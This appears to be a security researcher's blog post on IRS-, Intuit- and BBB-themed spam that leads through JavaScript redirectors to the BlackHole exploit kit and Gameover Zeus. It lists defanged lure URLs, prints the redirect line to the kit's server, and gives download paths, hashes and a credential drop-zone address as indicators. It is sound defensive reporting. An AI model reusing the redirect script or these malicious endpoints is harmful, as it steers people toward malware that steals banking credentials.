IRS-Intuit-BBB themed spams -to- BlackHole -to- Gameover Zeus

Subject: IRS notification of your tax appeal status.
URL: hxxp://pedrasecompanhia.com.br/KdiK8scE/index.html

IRS notification of your tax appeal status

Subject: Rejection of your tax appeal.
URL: hxxp://entertain4you.com/iWYE2wes/index.html

Rejection of your tax appeal

Subject: Your tax return appeal is declined
URLs: hxxp://pedrasecompanhia.com.br/iWYE2wes/index.html

Your tax return appeal is declined

Subject: Your Intuit.com software order.
URLs: hxxp://panacea-retail.com/N192yy6H/index.html
hxxp://mondistar.ro/fUjtMi6v/index.html
hxxp://panacea-retail.com/N192yy6H/index.html

Your Intuit.com software order

Subject: Your intuit.com order.
URLs: hxxp://pinter.rsia-andini.com/KdiK8scE/index.html
hxxp://pinter.rsia-andini.com/Q8dvz6Dw/index.html
hxxp://mainfar.zxq.net/fUjtMi6v/index.html

Your intuit.com order

Subject: Re: your customers complaint ID 50606977.
URLs: hxxp://almeidadohrn.com/wp-includes/opek.html

Re: your customers complaint ID 50606977

Subject: Your company Better Business Bureau complaint.
URLs: hxxp://thearabmatch.com/8ViaUCMr/index.html
hxxp://mirsatmurutoglu.freehosting.com/TcS203Fn/index.html
http://mondistar.ro/N192yy6H/index.html

Your company Better Business Bureau complaint

Your company Better Business Bureau complaint

Subject: BBB processing RE: Case ID 33614330
URLs: hxxp://michael-ngo.com/wp-includes/opek.html

BBB processing RE: Case ID 33614330

Subject: BBB case ID 35908630
URLs: hxxp://womens-issues.medicalbillingclassesonline.info/wp-includes/opek.html

BBB case ID 35908630

Subject: Your business is accused of illegal activities.
URLs: hxxp://travianx10.host.org/FMG8bqfk/index.html
hxxp://southernmagnetics.com/FMG8bqfk/index.html
hxxp://pedrasecompanhia.com.br/h2gVqD1Q/index.html
hxxp://impresilk.com.br/8ViaUCMr/index.html

Your business is accused of illegal activities.

Your business is accused of illegal activities.

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 207.210.65.102:

document.location=’hxxp://173.224.71.132:8080/showthread.php?t=d44175c6da768b70′;

It downloadeds Gameover Zeus (installer) from the following location:

173.224.71.132:8080 /q.php?f=e0c3a&e=2

File: calc.exe
MD5: 0599eb89a5ca8ea3b7c887e3940d1a33
Size: 2,86,703 bytes

This Gameover variant is detected by 3 of 43 AV vendors on VirusTotal. It then installs Zeus in %APPDATA% which had following properties:

File: ycegv.exe
MD5: e34904d4dbd79ee5ac9148adc37534cb
Size: 2,73,944 bytes
Other: This file is digitally signed by ‘aPgdobQNbLOM’
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:07:23 16:34:06+02:00

This Gameover variant is detected by 7 of 43 AV vendors on VirusTotal.
The Gameover variant had a bot id of “ppcz14″ cid of “3004″ and posted online banking credentials stolen from victims to a drop zone at 87.97.164.223 over port 22005.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: